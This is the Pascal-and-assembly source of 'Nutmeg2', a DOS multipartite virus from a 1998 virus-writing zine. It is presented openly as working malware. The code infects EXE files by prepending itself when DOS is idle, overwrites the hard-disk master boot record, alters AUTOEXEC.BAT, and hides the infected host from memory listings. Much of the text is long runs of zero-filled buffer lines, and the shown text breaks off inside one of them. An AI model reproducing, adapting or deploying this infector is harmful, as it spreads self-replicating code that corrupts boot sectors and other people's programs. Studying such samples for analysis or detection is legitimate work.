29A Issue 03 06 13
{
[Nutmeg2] Turbo Pascal Multipartite EXE/MBR infector
Copyright 1998 (c) Vecna
This is the first known virus written in an HLL that also infects the MBR. It
infects the owner of the environment on each interrupt 0x28 call, which is issued
when DOS is idle. The virus places itself at the start of the infected file,
adding 4096 bytes to it. It is a prepender that re-executes the host, but under
the original name, so if the host program goes memory resident, MEM.EXE does not
show a foreign program as resident. It also has the so-called "host stealth",
infecting all files, including those with self-checks. Two external assembler
routines are used to give the virus its multipartite ability. The virus is
packed with LZEXE, and replicates in this form.
Two big ugly buffers are used as temporary storage when copying and
working on the MBR. As the file is packed, although they occupy large memory areas,
they do not increase the file length.
}
{$F+}
{$S-}
{$M 8192,0,0}
PROGRAM NUTMEG;
USES DOS;
CONST VIRSIZE=4096;
TYPE BUFFER=ARRAY[0..VIRSIZE - 1] OF CHAR;
VAR HANDLE:WORD;
ENVSEG:WORD;
ENVOFF:WORD;
PSPSEG:WORD;
FILENAME:STRING[128];
MYNAME:STRING[128];
OLDNAME:STRING[128];
MYPARAMS:STRING[128];
VIRBUFFER:BUFFER;
AEXEC:BOOLEAN;
PROCEDURE GETSEGMENTS; ASSEMBLER;
ASM
MOV AH, 51H
INT 21H
MOV ES, BX
MOV ES, ES:[2CH]
MOV ENVSEG, ES
MOV PSPSEG, BX
END;
PROCEDURE FSEEK(POINTER:WORD); ASSEMBLER;
ASM
MOV AX, 4200H
MOV BX, HANDLE
XOR CX, CX
MOV DX, POINTER
INT 21H
END;
PROCEDURE READFILE(VAR FILEBUF:BUFFER; READNUM:WORD); ASSEMBLER;
ASM
PUSH DS
MOV AH, 3FH
MOV BX, HANDLE
MOV CX, READNUM
LDS DX, FILEBUF
INT 21H
POP DS
END;
PROCEDURE WRITEFILE(FILEBUF:BUFFER; WRITENUM:WORD); ASSEMBLER;
ASM
PUSH DS
MOV AH, 40H
MOV BX, HANDLE
MOV CX, WRITENUM
LDS DX, FILEBUF
INT 21H
POP DS
END;
PROCEDURE OPENFILE(FILENAME:STRING; ACCESS:BYTE); ASSEMBLER;
ASM
PUSH DS
MOV AH, 3DH
MOV AL, ACCESS
LDS DX, FILENAME
INC DX
INT 21H
MOV HANDLE, AX
POP DS
END;
PROCEDURE ERASEFILE(FILENAME:STRING); ASSEMBLER;
ASM
PUSH DS
MOV AH, 41H
LDS DX, FILENAME
INC DX
INT 21H
POP DS
END;
PROCEDURE CLOSEFILE; ASSEMBLER;
ASM
MOV AH, 3EH
MOV BX, HANDLE
INT 21H
END;
PROCEDURE CREATENEWFILE(FILENAME:STRING; ATTRIBUTES:WORD); ASSEMBLER;
ASM
PUSH DS
MOV AH, 3CH
MOV CX, ATTRIBUTES
LDS DX, FILENAME
INC DX
INT 21H
MOV HANDLE, AX
POP DS
END;
PROCEDURE RENAMEFILE(SOURCE:STRING;DESTINATION:STRING); ASSEMBLER;
ASM
PUSH DS
MOV AH, 56H
LDS DX, SOURCE
INC DX
LES DI, DESTINATION
INC DI
INT 21H
POP DS
END;
PROCEDURE COPYTO(DESTINATION:STRING; SOURCE:STRING; STARTAT:WORD); ASSEMBLER;
VAR HANDLE1,HANDLE2:WORD;
ASM
PUSH DS
MOV AX,3D00H
LDS DX,SOURCE
INC DX
INT 21H
MOV HANDLE1, AX
MOV AX,3D02H
LDS DX,DESTINATION
INC DX
INT 21H
MOV HANDLE2, AX
MOV AX, 4200H
MOV BX, HANDLE1
XOR CX, CX
MOV DX, STARTAT
INT 21H
MOV AX, 4202H
MOV BX, HANDLE2
XOR CX, CX
CWD
INT 21H
PUSH CS
POP DS
MOV DX, OFFSET @BUFFER
@NEXTCHUNK:
MOV AH, 3FH
MOV BX, HANDLE1
MOV CX, 16*64*4
INT 21H
MOV CX, AX
MOV AH, 40H
MOV BX, HANDLE2
INT 21H
CMP AX, 16*64*4
JE @NEXTCHUNK
MOV AH, 3EH
MOV BX, HANDLE1
INT 21H
MOV AH, 3EH
MOV BX, HANDLE2
INT 21H
JMP @EXIT
@BUFFER:
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
@EXIT:
POP DS
END;
FUNCTION RANDOMNAME: STRING;
FUNCTION POELETRA(QTAS:CHAR): STRING;
VAR CH:CHAR;
TEMP:STRING[12];
BEGIN
TEMP:='';
REPEAT
CH:=CHR(65+RANDOM(25));
TEMP:=TEMP+CH;
UNTIL TEMP[0]=QTAS;
POELETRA:=TEMP;
END;
BEGIN
RANDOMNAME:=POELETRA(#8)+'.'+POELETRA(#3)+#0;
END;
PROCEDURE PSPOWNER;
BEGIN
ENVOFF:=0;
FILENAME:='';
GETSEGMENTS;
REPEAT
ENVOFF:=ENVOFF+1;
UNTIL MEMW[ENVSEG:ENVOFF]=$00;
ENVOFF:=ENVOFF+4;
REPEAT
FILENAME:=FILENAME+CHR(MEM[ENVSEG:ENVOFF]);
ENVOFF:=ENVOFF+1;
UNTIL MEM[ENVSEG:ENVOFF-1]=$00;
END;
PROCEDURE VIRUSINT28; INTERRUPT;
PROCEDURE INFECTEXE;
VAR NEWNAME:STRING[128];
WHERESLASH:WORD;
OK:BYTE;
BEGIN
OK:=0;
ASM
PUSH DS
MOV AX, SEG FILENAME
MOV DS, AX
MOV SI, OFFSET FILENAME
MOV DX, SI
INC DX
MOV AX, 4300H
INT 21H
JC @TERMINATED
CMP CX, 1
JE @TERMINATED
XOR CX, CX
@SEARCHSLASH:
INC SI
INC CX
CMP BYTE PTR DS:[SI], 0
JE @TERMINATED
CMP BYTE PTR DS:[SI], '\'
JNE @SEARCHSLASH
MOV WHERESLASH, CX
MOV OK, 1
JMP @SEARCHSLASH
@TERMINATED:
POP DS
END;
IF OK=1 THEN BEGIN
NEWNAME:=COPY(FILENAME,1,WHERESLASH)+RANDOMNAME;
RENAMEFILE(FILENAME,NEWNAME);
CREATENEWFILE(FILENAME,0);
WRITEFILE(VIRBUFFER,VIRSIZE);
CLOSEFILE;
COPYTO(FILENAME,NEWNAME,0);
ERASEFILE(NEWNAME);
END;
ASM
PUSH DS
MOV AX, SEG FILENAME
MOV DS, AX
MOV DX, OFFSET FILENAME
INC DX
MOV AX, 4301H
MOV CX, 1
INT 21H
POP DS
END;
END;
BEGIN
PSPOWNER;
IF NOT(OLDNAME=FILENAME) THEN BEGIN
IF (FILENAME[LENGTH(FILENAME)-1]='E') THEN INFECTEXE;
OLDNAME:=FILENAME;
END;
END;
PROCEDURE INITALL;
VAR COUNT:BYTE;
BEGIN
AEXEC:=TRUE;
RANDOMIZE;
PSPOWNER;
MYNAME:=FILENAME;
OPENFILE(MYNAME,0);
READFILE(VIRBUFFER,VIRSIZE);
CLOSEFILE;
IF PARAMSTR(1)='!' THEN BEGIN
ASM
PUSH DS
PUSH CS
POP DS
CALL @GETNAME
DB 'AUTOEXEC.BAT', 0
@GETNAME:
POP DX
MOV AX, 3D02H
INT 21H
JC @ECA
XCHG AX, BX
MOV AX, 4202H
MOV CX, -1
MOV DX, -19
INT 21H
MOV AH, 40H
XOR CX, CX
INT 21H
MOV AH, 3EH
INT 21H
MOV AX, SEG MYNAME
MOV DS, AX
MOV DX, OFFSET MYNAME
INC DX
MOV AX, 4301H
XOR CX, CX
INT 21H
JC @ECA
MOV AH, 41H
INT 21H
@ECA:
POP DS
END;
AEXEC:=FALSE;
END;
FOR COUNT:=1 TO PARAMCOUNT DO MYPARAMS:=MYPARAMS+PARAMSTR(COUNT)+' ';
END;
PROCEDURE SPAWNHOST;
VAR NEWNAME:STRING[128];
INF, OUTF:FILE;
ATTR:WORD;
BEGIN
IF AEXEC=TRUE THEN BEGIN
ASM
PUSH DS
MOV AX, SEG MYNAME
MOV DS, AX
MOV DX, OFFSET MYNAME
INC DX
MOV AX, 4300H
INT 21H
MOV ATTR, CX
MOV AX, 4301H
XOR CX, CX
INT 21H
POP DS
END;
NEWNAME:=RANDOMNAME;
RENAMEFILE(MYNAME,NEWNAME);
CREATENEWFILE(MYNAME,2);
CLOSEFILE;
COPYTO(MYNAME,NEWNAME,VIRSIZE);
SWAPVECTORS;
EXEC(MYNAME, MYPARAMS);
SWAPVECTORS;
ERASEFILE(MYNAME);
RENAMEFILE(NEWNAME,MYNAME);
ASM
PUSH DS
MOV AX, SEG MYNAME
MOV DS, AX
MOV DX, OFFSET MYNAME
INC DX
MOV AX, 4301H
MOV CX, ATTR
INT 21H
MOV AX, SEG NEWNAME
MOV DS, AX
MOV DX, OFFSET NEWNAME
INC DX
MOV AX, 4301H
XOR CX, CX
INT 21H
MOV AH, 41H
INT 21H
POP DS
END;
END;
END;
FUNCTION RESIDENT:BOOLEAN;
VAR IVT:LONGINT;
BEGIN
IVT:=MEML[$0:$350];
IF IVT=$20FF20FF THEN RESIDENT:=TRUE ELSE RESIDENT:=FALSE;
END;
PROCEDURE MLOADER; EXTERNAL;
{$L MLOADER.OBJ}
PROCEDURE LOADER; EXTERNAL;
{$L LOADER.OBJ}
PROCEDURE INFECTMBR;
BEGIN
ASM
PUSH DS
PUSH CS
POP ES
PUSH CS
POP DS
MOV AH, 08H
MOV DX, 0080H
INT 13H
AND CX, 00111111B
CMP CL, ((VIRSIZE+511)/512)+6
JB @OVERBUFFER
MOV AX, 0201H
MOV CX, 0001H
MOV BX, OFFSET @BUFFER
MOV DX, 0080H
INT 13H
JC @OVERBUFFER
MOV DI, BX
MOV SI, OFFSET MLOADER
MOV AX, WORD PTR [SI]
CMP WORD PTR [DI], AX
JE @OVERBUFFER
MOV AX, 0301H
MOV CX, 0002H
INT 13H
JC @OVERBUFFER
MOV CX, OFFSET LOADER
SUB CX, OFFSET MLOADER
CLD
REP MOVSB
MOV AX, 0301H
MOV CX, 0001H
MOV DX, 0080H
INT 13H
JC @OVERBUFFER
MOV AX, 0302H
MOV CX, 0003H
MOV BX, OFFSET LOADER
MOV DX, 0080H
INT 13H
JC @OVERBUFFER
MOV BX, OFFSET VIRBUFFER
MOV AX, SEG VIRBUFFER
MOV ES, AX
MOV AX, 300H+((VIRSIZE+511)/512)
MOV CX, 0005H
INT 13H
JMP @OVERBUFFER
@BUFFER:
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
